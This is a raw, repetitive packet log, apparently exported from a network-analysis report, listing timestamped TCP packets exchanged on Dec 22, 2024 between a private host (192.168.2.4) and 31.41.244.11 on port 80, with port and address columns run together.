                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.100697994 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.100733042 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.100745916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.100776911 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101468086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101516008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101598024 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101633072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101645947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.101680040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102377892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102507114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102518082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102556944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102562904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.102601051 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103271961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103333950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103399992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103446007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103454113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.103492975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104280949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104326963 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104393959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104439020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104444027 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.104480028 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105015993 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105067968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105314016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105362892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105431080 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105477095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105484962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.105519056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106220961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106275082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106288910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106338024 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106340885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.106394053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107089043 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107141972 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107247114 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107281923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107297897 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107325077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.107983112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108041048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108098030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108131886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108150005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108167887 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108858109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108913898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.108969927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109005928 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109019995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109040976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109733105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109782934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109849930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109884024 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109900951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.109924078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110637903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110711098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110735893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110752106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110784054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.110800982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111522913 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111592054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111620903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111637115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111666918 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.111687899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112390995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112464905 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112483025 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112498999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112528086 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.112543106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.113286972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.113343000 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.113382101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.113439083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117788076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117804050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117819071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117850065 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117866039 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.117973089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118021965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118236065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118264914 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118297100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118325949 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118851900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.118908882 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277451038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277585983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277586937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277625084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277635098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277662992 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277667046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277712107 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277796030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277857065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.277990103 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278562069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278620958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278661013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278700113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278708935 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.278740883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279445887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279500008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279565096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279601097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279617071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.279643059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280347109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280400038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280440092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280474901 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280491114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.280517101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281222105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281276941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281317949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281353951 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281368971 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.281395912 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282104015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282157898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282218933 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282253027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282267094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282294989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.282993078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283051968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283099890 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283137083 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283154011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283176899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283899069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.283951998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284008026 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284044027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284059048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284091949 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284759998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284815073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284847021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284895897 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284897089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.284945965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285651922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285706043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285758018 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285793066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285809040 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.285830975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286528111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286576986 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286643028 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286679029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286695957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.286740065 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287446976 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287504911 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287585020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287623882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287633896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.287673950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288319111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288377047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288427114 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288461924 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288476944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.288508892 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289201975 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289251089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289319038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289354086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289367914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.289413929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290127039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290189028 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290198088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290234089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290246964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290276051 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.290978909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291029930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291079044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291114092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291131020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291156054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291891098 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291940928 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.291994095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292030096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292048931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292078018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292752981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292812109 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292879105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292913914 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292933941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.292958975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293668032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293720007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293752909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293788910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293798923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.293834925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294531107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294583082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294673920 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294708967 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294723034 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294763088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.294785976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295433998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295488119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295555115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295591116 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295607090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.295634031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296308041 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296360016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296576023 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296624899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296696901 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296731949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296752930 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.296776056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297492027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297545910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297651052 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297686100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297704935 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.297724962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298393011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298448086 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298506021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298541069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298558950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.298582077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299272060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299334049 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299396038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299429893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299448013 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.299470901 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300183058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300236940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300282001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300316095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300335884 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.300355911 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301055908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301110983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301160097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301194906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301214933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301234007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:16.301928997 CET804976531.41.244.11192.168.2.4
